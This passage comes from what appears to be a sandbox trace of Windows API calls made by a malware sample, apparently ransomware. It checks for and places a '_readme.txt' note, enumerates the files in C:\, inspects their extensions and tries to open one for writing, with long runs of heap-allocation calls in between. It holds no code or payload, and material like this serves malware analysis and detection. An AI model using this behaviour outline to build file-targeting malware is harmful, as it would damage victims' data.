lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x90f71c0, ftCreationTime.dwHighDateTime=0x1d4c6be, ftLastAccessTime.dwLowDateTime=0x5c61f380, ftLastAccessTime.dwHighDateTime=0x1d4cce4, ftLastWriteTime.dwLowDateTime=0x5c61f380, ftLastWriteTime.dwHighDateTime=0x1d4cce4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.435] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.435] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.435] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.435] PathFindFileNameW (pszPath="") returned="" [0056.435] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.436] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.436] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.436] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.436] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0056.436] PathFileExistsW (pszPath="C:\\_readme.txt") returned 1 [0056.436] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x68d798 [0056.436] PathFindExtensionW (pszPath="C:\\bootmgr") returned="" [0056.436] PathFindExtensionW (pszPath="C:\\BOOTSECT.BAK") returned=".BAK" [0056.437] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0056.437] PathFindExtensionW (pszPath="C:\\hiberfil.sys") returned=".sys" [0056.438] PathFindExtensionW (pszPath="C:\\pagefile.sys") returned=".sys" [0056.438] PathFindExtensionW (pszPath="C:\\_readme.txt") returned=".txt" [0056.438] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.438] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.438] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0056.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e9c8 [0056.438] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.440] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.440] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.441] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.441] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.442] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.442] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ee00 [0056.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.444] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ee00 | out: hHeap=0x660000) returned 1 [0056.444] RtlAllocateHeap (HeapHandle=0x660000, 